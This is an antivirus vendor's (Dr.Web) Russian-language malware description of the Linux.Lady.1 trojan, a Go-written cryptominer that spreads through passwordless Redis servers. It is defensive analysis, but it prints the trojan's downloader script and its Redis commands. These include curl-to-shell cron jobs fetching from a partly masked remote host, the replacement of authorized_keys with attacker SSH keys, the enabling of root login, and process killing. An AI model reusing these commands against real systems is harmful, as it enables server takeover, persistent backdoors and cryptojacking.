Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.Lady.1

Добавлен в вирусную базу Dr.Web: 2016-08-04

Описание добавлено:

SHA1:

  • d9a74531d24c76f3db95baed9ebf766a2bc0300d

Троянец для операционных систем семейства Linux, написанный на языке Go. Обладает следующими функциональными возможностями:

  1. сбор и передача информации о зараженном компьютере на управляющий сервер;
  2. скачивание и запуск утилиты для добычи (майнинга) криптовалют;
  3. атака других компьютеров в сети с целью установки на них собственной копии.

При запуске троянец проверяет наличие ключей, при отсутствии которых завершает работу:

  • Version — вывести на экран версию троянца и завершить работу;
  • Install — установить троянца в системе;
  • D — запустить основные функции троянца.

При запуске с ключом Install проверяет, соответствует ли имя исполняемого файла /usr/sbin/ntp. Если нет, то копирует себя по этому пути и создает файл /etc/systemd/system/ntp.service следующего содержания:

[Unit]
Description=NTP daemon
ConditionFileIsExecutable=/usr/sbin/ntp
[Service]
StartLimitInterval=5
StartLimitBurst=10
ExecStart=/usr/sbin/ntp "-D"
Restart=always
RestartSec=120
[Install]
WantedBy=multi-user.target

После этого запускает свою копию с ключом D. При этом троянец создает 4 потока, каждому из которых передает свой канал. С их помощью потокам передаются следующие структуры:

"chan []st.IPRule"
"chan st.Minerd"
"chan st.Update"
"chan []st.Attack"

Затем вредоносная программа переходит в режим сна на период от 15 до 45 секунд, после чего передает на управляющий сервер следующую информацию:

  • версию троянца;
  • количество процессоров на зараженной машине;
  • имя хоста;
  • количество запущенных процессов;
  • имя ОС;
  • семейство ОС;
  • время непрерывной работы хоста (аптайм).

В ответ троянец получает конфигурационный файл, содержащий необходимую для его работы информацию. Затем он загружает и запускает утилиту для добычи (майнинга) криптовалют. Троянец определяет внешний IP-адрес инфицированной машины с помощью специальных сайтов, ссылки на которые вредоносная программа получает в файле конфигурации. Затем он вычисляет на его основе маску подсети External_ip\8 (маска 255.0.0.0) и пытается подключиться к удаленным узлам через порт 6379 (redis) без пароля. Если подключение удается, троянец обращается к указанному в файле конфигурации URL, загружает оттуда сценарий, детектируемый под именем Linux.DownLoader.196, и добавляет его в cron атакованной машины:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.*****ring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r. *****ring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fsSL http://r. ****ring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
    fi
fi
/etc/init.d/ntp start
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

После соединения троянец выполняет на удаленном узле следующие команды:

config set stop-writes-on-bgsave-error no
config set rdbcompression no
config set dir /var/spool/cron
config set dbfilename root
set 1 ("\n\n*/1 * * * * curl -L %s | sh\n\n") % (ShellUrl из конфига)
save
config set dir /root/.ssh
config set dbfilename authorized_keys
set 1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4TjWxZeA8JlaBwfvgtjvDT0bm9d4JGbzz1KIIGyvSKxd7bqYLwXfxr0Q+tZxF5nHXldH2pRNacD7Gm8XX4aZCUYlL5Ev0goYmOTgXOQNkgyVQKPE6KGV5BZpNoB2sbIkuweLbbdZaOcncnFvAEh7dVUQ5lh2QLz/IuRzakrzaJeTPiaD3BAyXhjcVwDFn1Lb84uiqc7nW6gw2bIaSMOrNTfZH/xftGdI'UpJoQK06jmFrTlpWaL5joAooc2Evan6XnqkO4g5In7tjhX8pBtCBGk78SKCJmkEjK'+xbN+7oZhuaeB/ubPm3xDahi+w1xHGZIt/N7z268Fz3rQAhBUZ+eQ==
save
del 1
set dir /tmp
set dbfilename dump.rdb
config set rdbcompression yes

В список authorized_keys троянец добавляет ключ для соединения по протоколу SSH. Затем пытается соединиться с удаленным узлом по протоколу SSH и, если это удается, выполняет следующую команду:

(curl -fsSL %s?ssh | sh) % (ShellUrl)

В своей архитектуре троянец использует множество библиотек, опубликованных на популярнейшем сервисе хранения и совместной разработки приложений GitHub.

screen #drweb

Новость о троянце

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру